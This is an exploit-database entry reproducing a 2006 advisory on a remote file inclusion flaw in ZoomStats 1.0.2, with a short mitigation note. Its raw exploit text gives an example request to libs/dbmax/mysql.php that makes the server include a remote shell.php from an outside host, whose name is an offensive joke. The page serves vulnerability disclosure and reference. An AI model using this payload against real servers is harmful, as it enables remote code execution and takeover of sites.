header-logo
Suggest Exploit
vendor:
ZoomStats
by:
Drago84
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: ZoomStats
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: N/A
Related CWE: N/A
CPE: a:zoomstats:zoomstats
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ToXiC

A remote file inclusion vulnerability exists in ZoomStats, due to the $GLOBALS['lib']['db']['path'] array not being declared. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the GLOBALS['lib']['db']['path'] parameter to the vulnerable page, mysql.php, located in the /libs/dbmax/ directory.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file path.
Source

Exploit-DB raw data:

###### ToXiC #########################
#
#BuG FounD  by Drago84
#
#Application Affect:ZoomStats
#Source Code:
#http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent
#Problem:
#$GLOBALS['lib']['db']['path'] array not declare
#Solution : $GLOBALS['lib']['db']['path']
#Page Vulnerable : mysql.php
#Dir Page: /libs/dbmax/
# Exempe Of ExPloit is:
#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# ToXic Security
###### ToXiC ###Drago84###############

# milw0rm.com [2006-09-24]

Navigation

Suggest Exploit

Services By CQR